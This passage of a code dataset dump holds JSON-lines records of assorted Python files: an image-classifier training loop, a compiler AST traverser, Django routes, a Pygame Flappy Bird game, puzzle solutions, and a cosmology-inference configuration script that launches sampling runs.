GarbageDataset(\n './garbage_dataset_v1/val', \n './garbage_dataset_v1/val.csv', \n transforms=get_train_transform(mean, std, 224)\n)\n\ntrain_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True, num_workers=8)\nval_dataloader = DataLoader(val_dataset, batch_size=batch_size, shuffle=False, num_workers=8)\n# ------------- ---------------\nwriter = None # 服务器pytorch版本太低\n# load train params -------------\ntitle = pretrainedmodel\n# resume = None\ncheckpoint_path = './saves'\nlogger = Logger(os.path.join(checkpoint_path, 'log.txt'), title=title)\nlogger.set_names(['Learning Rate', 'Train Loss', 'Valid Loss', 'Train Acc.', 'Valid Acc.'])\n# if resume:\n# print('==> Resuming from checkpoint')\n# assert os.path.isfile(resume), 'Error no checkpoint file'\n# checkpoint_dir = os.path.dirname(resume)\n# chechpoint = torch.load(resume)\n# best_acc = checkpoint['best_acc']\n# start_epoch = chechpoint['epoch']\n# model.load_state_dict(chechpoint['state_dict'])\n# optimizer.load_state_dict(chechpoint['optimizer'])\n# logger = Logger(os.path.join(checkpoint_dir, 'log.txt'), title=title, resume=True)\n# else:\n# logger = Logger(os.path.join(checkpoint_path, 'log.txt'), title=title)\n# logger.set_names(['Learning Rate', 'Train Loss', 'Valid Loss', 'Train Acc.', 'Valid Acc.'])\n\n\n# train ------------\nfor epoch in range(start_epoch, tot_epoch):\n print('\\nEpoch [%d | %d] LR: %f' % (epoch + 1, tot_epoch, optimizer.param_groups[0]['lr']))\n \n train_loss, train_acc, train_5 = train(train_dataloader, model, criterion, optimizer, epoch, device, writer)\n test_loss, test_acc, test_5 = test(val_dataloader, model, criterion, epoch, device, writer)\n\n # logger.append([ lr, train_loss, test_loss, train_acc, test_acc ])\n print('train_loss:%f, val_loss:%f, train_acc:%f, train_5:%f, val_acc:%f, val_5:%f' % (train_loss, test_loss, train_acc, train_5, test_acc, test_5))\n\n is_best = test_acc > best_acc\n best_acc = max(test_acc, best_acc)\n\n save_checkpoint({\n 'fold': 1,\n 'epoch': epoch + 1,\n 'state_dict': model.state_dict(),\n 'train_acc': train_acc,\n 'acc': test_acc,\n 'best_acc': best_acc,\n 'optimizer': optimizer.state_dict(),\n }, is_best, single=False, checkpoint=checkpoint_path, filename='test')\n\n if lr_scheduler is not None:\n lr_scheduler.step(test_loss)\n\nlogger.close()\nlogger.plot()\nsavefig(os.path.join(checkpoint_path, 'log.eps'))\nprint('Best Acc:{}'.format(best_acc))\n","repo_name":"x670783915/huaweiyun_garbage_classify__learning","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"21796551646","text":"def traverse(ast, visitor):\n def traverseArray(array, parent):\n for child in array:\n traverseNode(child, parent)\n\n def traverseNode(node, parent):\n entryFunction = visitor.get(node[\"type\"])\n\n if entryFunction:\n # Call enter function\n entryFunction(node, parent)\n\n if (node[\"type\"] == 'Program'):\n traverseArray(node[\"body\"], node)\n elif (node[\"type\"] == 'CallExpression'):\n traverseArray(node[\"params\"], node)\n elif (node[\"type\"] == 'NumberLiteral' or node[\"type\"] == 'StringLiteral'):\n return\n \n traverseNode(ast, None)\n","repo_name":"DennisPlaydon/tiny-compiler-python","sub_path":"traverser.py","file_name":"traverser.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1680306629","text":"from typing import TYPE_CHECKING\n\nif TYPE_CHECKING:\n from data_fast_insights import BinaryDependenceModelData\n\n\ndef choose_central_tendency_metric(col_name: str, model_data: 'BinaryDependenceModelData'):\n if col_name == model_data.y_name or col_name in model_data.num_cols:\n use_metrics = 'mean'\n elif col_name in model_data.cat_cols:\n use_metrics = 'mode'\n else:\n raise ValueError('col_name not found in num_cols or cat_cols of model_data')\n return use_metrics\n","repo_name":"xsolla/data-fast-insights","sub_path":"data_fast_insights/utils/calc_utils.py","file_name":"calc_utils.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20346579780","text":"from django.contrib import admin\nfrom django.urls import path, re_path\nfrom first import views\nfrom .views import *\n\n\n\nurlpatterns = [\n path('example', example.foo),\n\n path('documents/upload', views.upload, name=\"file_upload\"),\n\n path('documents', documents.document_list, name=\"document_list\"),\n path('documents/add', documents.document_add, name=\"document_add\"),\n path('documents/', documents.document_view, name=\"document_view\"),\n path('documents//change', documents.document_change, name=\"document_change\"),\n\n path('sentences', sentences.sentence_list),\n path('sentences/add', sentences.sentence_add),\n path('sentences/', sentences.sentence_view),\n path('sentences//change', sentences.sentence_change),\n\n path('clauses', clauses.clause_list),\n path('clauses/add', clauses.clause_add),\n path('clauses/', clauses.clause_view),\n path('clauses//change', clauses.clause_change),\n\n\n path('syntaxemes', syntaxemes.syntaxeme_list),\n path('syntaxemes/add', syntaxemes.syntaxeme_add),\n path('syntaxemes/', syntaxemes.syntaxeme_view),\n path('syntaxemes//change', syntaxemes.syntaxeme_change),\n\n path('wordforms', wordforms.wordform_list),\n path('wordforms/add', wordforms.wordform_add),\n path('wordforms/', wordforms.wordform_view),\n path('wordforms//change', wordforms.wordform_change),\n\n]","repo_name":"useribraim/django","sub_path":"first/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18486886096","text":"##Project : Flappy Bird Game , Balla Prem Nikhil\n\nfrom typing import Tuple\nimport pygame\nfrom pygame.locals import * \nimport random\n\npygame.init()\nclock = pygame.time.Clock()\nwhite = (255, 255, 255)\nfps = 60\nscreen_width = 675\nscreen_height = 732\nscreen = pygame.display.set_mode((screen_width, screen_height))\npygame.display.set_caption('Flappy Bird')\n#font (is included in the folder, double click and install)\nfont = pygame.font.SysFont('04B_19', 30)\n\n\n\n#Game Variables\nground_scroll = 0\nscroll_speed = 4 \nflying = False\ngame_over = False\npipe_gap = 250\npipe_frequency = 1200 # milliseconds\nlast_pipe = pygame.time.get_ticks() - pipe_frequency\nscore = 0\ntop_score = 0\npass_pipe = False\n\n#Images\nbg = pygame.image.load('game_assets/background.png')\nground_img = pygame.image.load('game_assets/floor.png')\nbutton_img = pygame.image.load('game_assets/restart.png')\n\n#Definitions\n\ndef draw_text(text, font, text_col, x, y):\n img = font.render(text, True, text_col)\n screen.blit(img, (x, y))\n\n\ndef reset_game():\n pipe_group.empty()\n flappy.rect.x = 100\n flappy.rect.y = int(screen_height / 2)\n score = 0\n return score\n\n#Classes\n\nclass Bird(pygame.sprite.Sprite):\n def __init__(self, x, y):\n pygame.sprite.Sprite.__init__(self)\n self.images = []\n self.index = 0\n self.count = 0\n for num in range(1, 4):\n img = pygame.image.load(f'game_assets/bird{num}.png')\n self.images.append(img)\n self.image = self.images[self.index]\n self.rect = self.image.get_rect()\n self.rect.center = [x, y]\n self.vel = 0\n self.clicked = False\n\n def update(self):\n\n if flying == True:\n #Gravity\n self.vel += 0.5\n if self.vel > 6.25:\n self.vel = 6.25\n if self.rect.bottom < 600:\n self.rect.y += int(self.vel)\n\n if game_over == False:\n #Jumping\n keys=pygame.key.get_pressed()\n if pygame.mouse.get_pressed()[0] == 1 or keys[K_SPACE] == 1:\n if self.clicked == False:\n self.vel = -7.8\n self.clicked = True\n if pygame.mouse.get_pressed()[0] == 0 or keys[K_SPACE] == 0:\n self.clicked = False\n\n #Animation\n self.count += 1\n flap_cooldown = 5\n\n if self.count > flap_cooldown:\n self.count = 0\n self.index += 1\n if self.index >= len(self.images):\n self.index = 0\n self.image = self.images[self.index]\n\n #Rotating bird\n self.image = pygame.transform.rotate(self.images[self.index], (-2) * self.vel)\n else:\n self.image = pygame.transform.rotate(self.images[self.index], -90)\n\nclass Pipe(pygame.sprite.Sprite):\n def __init__(self, x, y, position):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load('game_assets/pipe.png')\n self.rect = self.image.get_rect()\n #postion 1 is from top, -1 id from bottom\n if position == 1:\n self.image = pygame.transform.flip(self.image, False, True)\n self.rect.bottomleft = [x, y - int(pipe_gap / 2)]\n if position == -1:\n self.rect.topleft = [x, y + int(pipe_gap / 2)]\n\n def update(self):\n self.rect.x -= scroll_speed\n if self.rect.right < 0:\n self.kill()\n\nclass Button():\n def __init__(self, x, y, image):\n self.image = image\n self.rect = self.image.get_rect()\n self.rect.topleft = (x, y)\n\n def draw(self):\n\n action = False\n\n #Getting position of mouse\n mpos = pygame.mouse.get_pos()\n\n #Checking if mouse hovered over button\n if self.rect.collidepoint(mpos):\n if pygame.mouse.get_pressed()[0] == 1:\n action = True\n\n #Spacare bar click check\n keys = pygame.key.get_pressed()\n if keys[K_SPACE] == 1:\n action = True\n\n #Draw\n screen.blit(self.image, (self.rect.x, self.rect.y))\n\n return action\n\nbird_group = pygame.sprite.Group()\npipe_group = pygame.sprite.Group()\n\nflappy = Bird(100, int(screen_height / 2))\nbird_group.add(flappy)\n\n#Restart Button\nbutton = Button(screen_width // 2 - 50, screen_height // 2 - 100, button_img)\n\nrun = True\nwhile run:\n\n clock.tick(fps)\n\n screen.blit(bg, (0, 0))\n\n bird_group.draw(screen)\n bird_group.update()\n pipe_group.draw(screen)\n\n #Drawing Ground\n screen.blit(ground_img, (ground_scroll, 600))\n\n #Score\n if len(pipe_group) > 0:\n if bird_group.sprites()[0].rect.left > pipe_group.sprites()[0].rect.left\\\n and bird_group.sprites()[0].rect.right < pipe_group.sprites()[0].rect.right\\\n and pass_pipe == False:\n pass_pipe = True\n if pass_pipe == True:\n if bird_group.sprites()[0].rect.left > pipe_group.sprites()[0].rect.right:\n score += 5\n pass_pipe = False\n draw_text(\"Score:\", font, white, int(100), 10) \n draw_text(str(score), font, white, int(200), 10)\n draw_text(\"Best Score:\", font, white, int(screen_width - 200), 10)\n draw_text(str(top_score), font, white, int(screen_width - 50), 10)\n\n #Collision Check\n if pygame.sprite.groupcollide(bird_group, pipe_group, False, False) or flappy.rect.top < 0:\n game_over = True\n\n #Checking game over\n if flappy.rect.bottom > 600:\n game_over = True\n flying = False\n\n\n if game_over == False and flying == True:\n\n #Pipe Generation\n time_now = pygame.time.get_ticks()\n if time_now - last_pipe > pipe_frequency:\n pipe_height = random.randint(-80, 80)\n btm_pipe = Pipe(screen_width, int(screen_height / 2) + pipe_height, -1)\n top_pipe = Pipe(screen_width, int(screen_height / 2) + pipe_height, 1)\n pipe_group.add(btm_pipe)\n pipe_group.add(top_pipe)\n last_pipe = time_now\n\n pipe_group.update()\n\n #Ground sliding\n ground_scroll -= scroll_speed\n if abs(ground_scroll) > 35:\n ground_scroll = 0\n\n #Resetting\n if game_over == True:\n if button.draw() == True:\n game_over = False\n if score > top_score:\n top_score = score\n score = reset_game()\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n \n keys=pygame.key.get_pressed()\n if event.type == pygame.MOUSEBUTTONDOWN or keys[K_SPACE] == 1: \n if flying == False and game_over == False:\n flying = True\n\n pygame.display.update()\n\npygame.quit()\n","repo_name":"PremNikhil/flappy","sub_path":"prem.py","file_name":"prem.py","file_ext":"py","file_size_in_byte":6743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9706930380","text":"import numpy as np\n\ndef part1():\n with open(\"day03.txt\") as f:\n a = f.read().split(\"\\n\")\n columsums = [sum([int(row[i]) for row in a]) for i in range(len(a[0]))]\n\n ma = \"\".join([str(int(colum < len(a)//2)) for colum in columsums])\n mi = \"\".join([str(int(colum > len(a)//2)) for colum in columsums])\n print(int(ma, base=2) * int(mi, base=2))\n\n\ndef part2():\n with open(\"day03.txt\") as f:\n a = f.read().split(\"\\n\")\n\n arr = np.array([list(map(int, line)) for line in a])\n\n ox = np.ones(len(arr), dtype=bool)\n co = np.ones(len(arr), dtype=bool)\n\n for i in range(len(a[0])):\n max_ox = (np.sum(arr[ox][:, i]) >= (np.sum(ox) + 1) // 2)\n min_co = (np.sum(arr[co][:, i]) < (np.sum(co) + 1) // 2)\n\n if sum(ox) > 1:\n ox &= arr[:, i] == max_ox\n if sum(co) > 1:\n co &= arr[:, i] == min_co\n\n ox_val = \"\".join(list(map(str, arr[ox][0])))\n co_val = \"\".join(list(map(str, arr[co][0])))\n\n print(int(ox_val, base=2) * int(co_val, base=2))\n\npart1()\npart2()","repo_name":"thatGuySpectre/AdventOfCode","sub_path":"2021/day03.py","file_name":"day03.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73884220268","text":"\"\"\"\nGiven an unsorted array of integers nums,\nreturn the length of the longest continuous increasing subsequence (i.e. subarray).\nThe subsequence must be strictly increasing.\n\nA continuous increasing subsequence is defined by two indices l and r (l < r)\nsuch that it is [nums[l], nums[l + 1], ..., nums[r - 1], nums[r]]\nand for each l <= i < r, nums[i] < nums[i + 1].\n\nExample 1:\n\nInput: nums = [1,3,5,4,7]\nOutput: 3\nExplanation: The longest continuous increasing subsequence is [1,3,5] with length 3.\nEven though [1,3,5,7] is an increasing subsequence,\nit is not continuous as elements 5 and 7 are separated by element\n4.\n\"\"\"\n\nclass Solution:\n def findLengthOfLCIS(self, nums):\n left = 0\n max_length = 0\n\n while left < len(nums):\n right = left + 1\n while right < len(nums) and nums[right] > nums[right - 1]:\n right += 1\n max_length = max(max_length, right - left)\n left = right\n\n return max_length\n\nif __name__ == '__main__':\n s = Solution()\n print(s.findLengthOfLCIS([1,3,5,4,7]))","repo_name":"Invalid-coder/Data-Structures-and-algorithms","sub_path":"Arrays/Tasks/leetcode(674).py","file_name":"leetcode(674).py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"50212429","text":"#!/usr/bin/python3\n'''Module for Base class'''\nimport json\n\n\nclass Base:\n '''\n Base class will be the “base” of all other classes in this project\n It will manage id attribute in all futures classes\n and to avoid duplicating the same code\n '''\n __nb_objects = 0\n\n def __init__(self, id=None):\n if id is not None:\n self.id = id\n else:\n Base.__nb_objects += 1\n self.id = Base.__nb_objects\n\n @staticmethod\n def to_json_string(list_dictionaries):\n if list_dictionaries is None or list_dictionaries == []:\n return (\"[]\")\n else:\n return (json.dumps(list_dictionaries))\n\n @classmethod\n def save_to_file(cls, list_objs):\n if list_objs is None or list_objs == []:\n content = []\n else:\n content = [cls.to_dictionary(obj) for obj in list_objs]\n cl_name = cls.__name__\n f_name = f\"{cl_name}.json\"\n\n with open(f_name, 'w') as my_file:\n my_file.write(cls.to_json_string(content))\n\n @staticmethod\n def from_json_string(json_string):\n if json_string is None or json_string == \"[]\":\n return ([])\n else:\n return (json.loads(json_string))\n\n @classmethod\n def create(cls, **dictionary):\n if cls.__name__ == \"Rectangle\":\n dummy = cls(1, 2)\n else:\n dummy = cls(1)\n dummy.update(**dictionary)\n return (dummy)\n\n @classmethod\n def load_from_file(cls):\n f_nm = f\"{cls.__name__}.json\"\n inst_l = []\n try:\n with open(f_nm, 'r') as myf:\n content = cls.from_json_string(myf.read())\n for elmt in content:\n inst = cls.create(**elmt)\n inst_l.append(inst)\n except FileNotFoundError:\n pass\n return (inst_l)\n","repo_name":"samuelolushegun/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42466581656","text":"import subprocess\nimport numpy as np\n\nif __name__ == \"__main__\":\n script = \"utils/run_kcap.py\"\n \n # Cosmic shear + GGL twopoint file\n twopoint_file_template = \"../Cat_to_Obs_K1000_P1/data/kids/fits_iterative_covariance/bp_KIDS1000_Blind{blind}_with_m_bias_V1.0.0A_ugriZYJHKs_photoz_SG_mask_LF_svn_309c_2Dbins_v2_goldclasses_Flag_SOM_Fid.fits\"\n\n # Covariance of the n(z)\n dz_cov_file = \"../Cat_to_Obs_K1000_P1/data/kids/nofz/SOM_cov_multiplied.asc\"\n dz_mean_file = \"../Cat_to_Obs_K1000_P1/data/kids/nofz/deltaz.asc\"\n \n # Compute the decorrelated dz mean shifts\n dz_cov = np.loadtxt(dz_cov_file)\n dz_mean = np.loadtxt(dz_mean_file)\n L = np.linalg.cholesky(dz_cov) \n L_inv = np.linalg.inv(L)\n dx_mean = L_inv @ dz_mean\n\n # BOSS files\n boss_data_files = [\"../Cat_to_Obs_K1000_P1/data/boss/Sanchez_etal_2017/BOSS.DR12.lowz.3xiwedges_measurements.txt\",\n \"../Cat_to_Obs_K1000_P1/data/boss/Sanchez_etal_2017/BOSS.DR12.highz.3xiwedges_measurements.txt\"]\n boss_cov_files = [\"../Cat_to_Obs_K1000_P1/data/boss/Sanchez_etal_2017/BOSS.DR12.lowz.3xiwedges_covmat.txt\",\n \"../Cat_to_Obs_K1000_P1/data/boss/Sanchez_etal_2017/BOSS.DR12.highz.3xiwedges_covmat.txt\"]\n\n\n multinest_settings = [\"--sampler-config\", \"multinest_efficiency\", \"0.3\",\n \"--sampler-config\", \"nested_sampling_tolerance\", \"1.0e-2\",\n \"--sampler-config\", \"live_points\", \"500\", \n ]\n\n timeout_setttings = [\"--set-keys\", \"wedges\", \"timeout\", \"600.0\"]\n\n nE_scale_cuts = [\"--set-keys\", \"scale_cuts\", \"keep_ang_PneE_1_1\", \"100 300\",\n \"--set-keys\", \"scale_cuts\", \"keep_ang_PneE_1_2\", \"100 300\",\n \"--set-keys\", \"scale_cuts\", \"keep_ang_PneE_1_3\", \"100 300\",\n \"--set-keys\", \"scale_cuts\", \"keep_ang_PneE_1_4\", \"100 300\",\n \"--set-keys\", \"scale_cuts\", \"keep_ang_PneE_1_5\", \"100 300\",\n \"--set-keys\", \"scale_cuts\", \"keep_ang_PneE_2_1\", \"100 600\",\n \"--set-keys\", \"scale_cuts\", \"keep_ang_PneE_2_2\", \"100 600\",\n \"--set-keys\", \"scale_cuts\", \"keep_ang_PneE_2_3\", \"100 600\",\n \"--set-keys\", \"scale_cuts\", \"keep_ang_PneE_2_4\", \"100 600\",\n \"--set-keys\", \"scale_cuts\", \"keep_ang_PneE_2_5\", \"100 600\",]\n\n Planck_settings = [\"--enable-modules\", \"planck_like\",\n \"--set-keys\", \"camb\", \"mode\", \"cmb\",\n \"--set-keys\", \"camb\", \"lmax\", \"2650\",\n \"--set-keys\", \"camb\", \"nonlinear\", \"both\",\n \"--set-keys\", \"camb\", \"do_lensing\", \"T\",\n \"--set-keys\", \"camb\", \"do_reionization\", \"T\",\n # Planck TTTEEE+lowl+lowE 5 sigma ranges, with S8 and ns having a 7 sigma lower range and h having a 7 sigma upper range.\n \"--set-parameters\", \"cosmological_parameters\", \"omch2\", \"0.11336956221293837 0.12 0.12703091064106695\",\n \"--set-parameters\", \"cosmological_parameters\", \"ombh2\", \"0.021615770756319073 0.0225 0.023103729722525095\",\n \"--set-parameters\", \"cosmological_parameters\", \"h0\", \"0.6425290065540109 0.7 0.7150188763839126\",\n \"--set-parameters\", \"cosmological_parameters\", \"n_s\", \"0.9342806461291905 0.97 0.986698010466018\",\n \"--set-parameters\", \"cosmological_parameters\", \"S_8_input\", \"0.7229290272333152 0.7458 0.9134139168266714\",\n \"--set-parameters\", \"cosmological_parameters\", \"tau\", \"0.015070795999054837 0.0543 0.09381939280201967\",\n \"--set-parameters\", \"planck\", \"a_planck\", \"0.9879083109867925 1.000610 1.0130810744845216\",\n \"--set-priors\", \"planck\", \"a_planck\", \"gaussian 1.0 0.0025\",]\n\n\n # Cosmology chains\n root_dir = \"runs/3x2pt/data_iterated_cov/cosmology/\"\n\n blinds = [] \n run_types = [\"EE\", \"EE_nE\", \"EE_w\"]\n\n use_Planck = [False]\n\n for blind in blinds:\n print(f\"Blind {blind}\")\n twopoint_file = twopoint_file_template.format(blind=blind)\n\n for run_type in run_types:\n print(f\" Run type: {run_type}\")\n\n for with_Planck in use_Planck:\n print(f\" Include Planck: {with_Planck}\")\n\n for sampler in [\"test\", \"multinest\"]:\n run_name_root = sampler\n\n run_name = f\"{run_name_root}_blind{blind}_{run_type}\"\n if with_Planck:\n run_name += \"_Planck\"\n\n # Base setup\n cmd = [\"--root-dir\", root_dir,\n \"--run-name\", run_name,\n \"--run-type\", run_type,\n \"--KiDS-data-file\", twopoint_file,\n \"--dz-covariance-file\", dz_cov_file,\n \"--BOSS-data-files\", *boss_data_files,\n \"--BOSS-covariance-files\", *boss_cov_files,\n \"--sampler\", sampler,]\n\n # dz prior means\n for i, m in enumerate(dx_mean):\n cmd += [\"--set-parameters\", \"nofz_shifts\", f\"p_{i+1}\", f\"-5.0 {m} 5.0\"]\n cmd += [\"--set-priors\", \"nofz_shifts\", f\"p_{i+1}\", f\"gaussian {m} 1.0\"]\n\n # GGL scale cuts\n if \"nE\" in run_type:\n cmd += nE_scale_cuts\n\n # Add Planck likelihood\n if with_Planck:\n cmd += Planck_settings\n\n # sampler settings\n if sampler == \"multinest\":\n cmd += multinest_settings\n\n if \"w\" in run_type:\n # Allow wedges to time out\n cmd += timeout_setttings\n\n # cmd += [\"--overwrite\"]\n\n subprocess.run([\"python\", script] + cmd, check=True)\n\n\n # Systematics chains\n root_dir = \"runs/3x2pt/data_iterated_cov_fast_extra/systematics/\"\n\n # Configs for tomographic bin cuts\n tomographic_bin_cut_configs = []\n for cut_bin in [[0], [1], [2], [3], [4], [0,1]]:\n cut_tomographic_EE = [f\"{i+1}+{j+1}\" for i in range(5) for j in range(i,5) if i in cut_bin or j in cut_bin]\n cut_tomographic_nE = [f\"{i+1}+{j+1}\" for i in range(2) for j in range(5) if j in cut_bin]\n\n for extra_GGL_cut in [\"1+1\", \"2+1\", \"2+2\", \"2+3\"]:\n if extra_GGL_cut not in cut_tomographic_nE:\n cut_tomographic_nE.append(extra_GGL_cut)\n\n # Covariance of the n(z)\n cut_bin_str = '_'.join([str(c+1) for c in cut_bin])\n dz_cut_bin_cov_file = f\"../Cat_to_Obs_K1000_P1/data/kids/nofz/SOM_cov_multiplied_bin{cut_bin_str}_removed.asc\"\n \n # Compute the decorrelated dz mean shifts\n dz_cut_bin_cov = np.loadtxt(dz_cut_bin_cov_file)\n L_cut_bin = np.linalg.cholesky(dz_cut_bin_cov) \n L_cut_bin_inv = np.linalg.inv(L_cut_bin)\n dx_cut_bin_mean = L_cut_bin_inv @ dz_mean\n\n parameter_settings = []\n for i, m in enumerate(dx_cut_bin_mean):\n if i in cut_bin:\n parameter_settings += [\"--set-parameters\", \"nofz_shifts\", f\"p_{i+1}\", f\"{m}\"]\n else:\n parameter_settings += [\"--set-parameters\", \"nofz_shifts\", f\"p_{i+1}\", f\"-5.0 {m} 5.0\"]\n parameter_settings += [\"--set-priors\", \"nofz_shifts\", f\"p_{i+1}\", f\"gaussian {m} 1.0\"]\n\n config = [\"--set-keys\", \"scale_cuts\", \"cut_pair_PeeE\", \" \".join(cut_tomographic_EE),\n \"--set-keys\", \"scale_cuts\", \"cut_pair_PneE\", \" \".join(cut_tomographic_nE)]\n config += [\"--dz-covariance-file\", dz_cut_bin_cov_file]\n\n config += parameter_settings\n\n tomographic_bin_cut_configs.append((f\"cut_z_bin_{''.join([str(c+1) for c in cut_bin])}\", config))\n\n no_baryon_configs = [(\"no_baryon\", [\"--set-parameters\", \"halo_model_parameters\", \"A\", \"3.13\"]),]\n\n no_higher_order_configs = [# (\"fix_ho_bias\", [\"--set-parameters\", \"bias_parameters\", \"b2_bin_1\", \"0.2\",\n # \"--set-parameters\", \"bias_parameters\", \"gamma3_bin_1\", \"0.9\",\n # \"--set-parameters\", \"bias_parameters\", \"a_vir_bin_1\", \"3.8\",\n # \"--set-parameters\", \"bias_parameters\", \"b2_bin_2\", \"0.5\",\n # \"--set-parameters\", \"bias_parameters\", \"gamma3_bin_2\", \"0.1\",\n # \"--set-parameters\", \"bias_parameters\", \"a_vir_bin_2\", \"3.0\",]),\n (\"zero_ho\", [\"--set-keys\", \"wedges\", \"local_lag_g2\", \"F\",\n \"--set-parameters\", \"bias_parameters\", \"b2_bin_1\", \"0.0\",\n \"--set-parameters\", \"bias_parameters\", \"gamma2_bin_1\", \"0.0\",\n \"--set-parameters\", \"bias_parameters\", \"gamma3_bin_1\", \"0.0\",\n \"--set-parameters\", \"bias_parameters\", \"a_vir_bin_1\", \"0.0\",\n \"--set-parameters\", \"bias_parameters\", \"b2_bin_2\", \"0.0\",\n \"--set-parameters\", \"bias_parameters\", \"gamma3_bin_2\", \"0.0\",\n \"--set-parameters\", \"bias_parameters\", \"gamma2_bin_2\", \"0.0\",\n \"--set-parameters\", \"bias_parameters\", \"a_vir_bin_2\", \"0.0\",])]\n\n ns_prior_configs = [(\"fix_ns\", [\"--set-parameters\", \"cosmological_parameters\", \"n_s\", \"0.9658923\",]),\n (\"narrow_ns_prior\", [\"--set-priors\", \"cosmological_parameters\", \"n_s\", \"gaussian 0.96 0.02\",])]\n\n As_prior_configs = [(\"fix_As\", [\"--set-parameters\", \"cosmological_parameters\", \"A_s\", \"2.1e-9\",\n \"--set-parameters\", \"cosmological_parameters\", \"S_8_input\", \"0.0\",\n #\"--enable-modules\", \"sample_ln_As\",\n \"--cut-modules\", \"sample_S8\",\n \"--cut-modules\", \"sigma8toAs\"]),]\n\n As_ns_prior_configs = [(\"fix_As_ns\", [\"--set-parameters\", \"cosmological_parameters\", \"A_s\", \"2.1e-9\",\n \"--set-parameters\", \"cosmological_parameters\", \"n_s\", \"0.9658923\",\n \"--set-parameters\", \"cosmological_parameters\", \"S_8_input\", \"none\",\n \"--cut-modules\", \"sample_S8\",\n \"--cut-modules\", \"sigma8toAs\"]),]\n\n w_scale_cuts_config = [(\"w_smax75\", [\"--set-keys\", \"wedges\", \"bands_range\", \"20 75\",\n \"--set-keys\", \"wedges\", \"points_range\", \"4 15\",\n \"--set-keys\", \"BOSS_like\", \"points_range\", \"4 15\"]),\n (\"w_smax100\", [\"--set-keys\", \"wedges\", \"bands_range\", \"20 100\",\n \"--set-keys\", \"wedges\", \"points_range\", \"4 20\",\n \"--set-keys\", \"BOSS_like\", \"points_range\", \"4 20\"])]\n\n configs = As_ns_prior_configs #+ ns_prior_configs + w_scale_cuts_config #no_higher_order_configs + tomographic_bin_cut_configs + no_baryon_configs\n \n blinds = [\"C\"]\n for blind in blinds:\n print(f\"Blind {blind}\")\n twopoint_file = twopoint_file_template.format(blind=blind)\n\n run_type = \"EE\"\n print(f\" Run type: {run_type}\")\n\n for config_name, config in configs:\n print(f\" Config: {config_name}\")\n for sampler in [\"test\", \"multinest\"]:\n run_name_root = sampler\n\n run_name = f\"{run_name_root}_blind{blind}_{run_type}_{config_name}\"\n\n # Base setup\n cmd = [\"--root-dir\", root_dir,\n \"--run-name\", run_name,\n \"--run-type\", run_type,\n \"--KiDS-data-file\", twopoint_file,\n \"--BOSS-data-files\", *boss_data_files,\n \"--BOSS-covariance-files\", *boss_cov_files,\n \"--sampler\", sampler,] \n\n # GGL scale cuts\n if \"nE\" in run_type:\n cmd += nE_scale_cuts\n\n if not \"cut_z_bin\" in config_name:\n cmd += [\"--dz-covariance-file\", dz_cov_file]\n # dz prior means\n for i, m in enumerate(dx_mean):\n cmd += [\"--set-parameters\", \"nofz_shifts\", f\"p_{i+1}\", f\"-5.0 {m} 5.0\"]\n cmd += [\"--set-priors\", \"nofz_shifts\", f\"p_{i+1}\", f\"gaussian {m} 1.0\"]\n\n cmd += config\n\n # sampler settings\n if sampler == \"multinest\":\n cmd += multinest_settings\n\n # Allow wedges to time out\n if \"w\" in run_type:\n cmd += timeout_setttings\n\n # cmd += [\"--overwrite\"]\n\n subprocess.run([\"python\", script] + cmd, check=True)","repo_name":"KiDS-WL/kcap","sub_path":"runs/3x2pt/3x2pt_configs.py","file_name":"3x2pt_configs.py","file_ext":"py","file_size_in_byte":13513,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"22886526265","text":"class Solution:\n def search(self, nums, target):\n pivot = self.find_pivot(nums, 0, len(nums) // 2)\n left_search = self.binary_search(nums, target, 0, pivot - 1)\n right_search = self.binary_search(nums, target, pivot, len(nums) - 1)\n\n if left_search == -1 and right_search == -1:\n return -1\n elif left_search != -1:\n return left_search\n else:\n return right_search\n \n def find_pivot(self, nums, left, right):\n if right == 0:\n return right\n if left == len(nums) - 1:\n return left\n if nums[right - 1] > nums[right]:\n return right\n\n if nums[left] > nums[right]: # is already pivoted\n return self.find_pivot(nums, left, (left + right) // 2)\n else:\n return self.find_pivot(nums, right, (right + len(nums)) // 2)\n\n \n def binary_search(self, nums, target, left, right):\n if right >= left:\n mid = (left + right) // 2\n\n if nums[mid] == target:\n return mid\n elif nums[mid] > target:\n return self.binary_search(nums, target, left, mid-1)\n else:\n return self.binary_search(nums, target, mid+1, right)\n else:\n return -1\n \nsolution = Solution()\n\n# Idea: \n# Find pivoted index\n# Run binary search again on left side and right of nums\n\nprint(solution.search([4,5,6,7,0,1,2], 0))\nprint(solution.search([4,5,6,7,0,1,2], 3))\nprint(solution.search([1], 0))","repo_name":"henriqueconte/Challenges","sub_path":"LeetCode/33.py","file_name":"33.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15323768738","text":"from Mail import Mail\nimport time\nimport random\n\nemail_names = [\"ryan\", \"ryan.yoak\", \"sam\", \"AOL\", \"badactor\", \"delozier\", \"awesomeness\", \"Wizard\"]\nemail_ats = [\"gmail.com\", \"aol.com\", 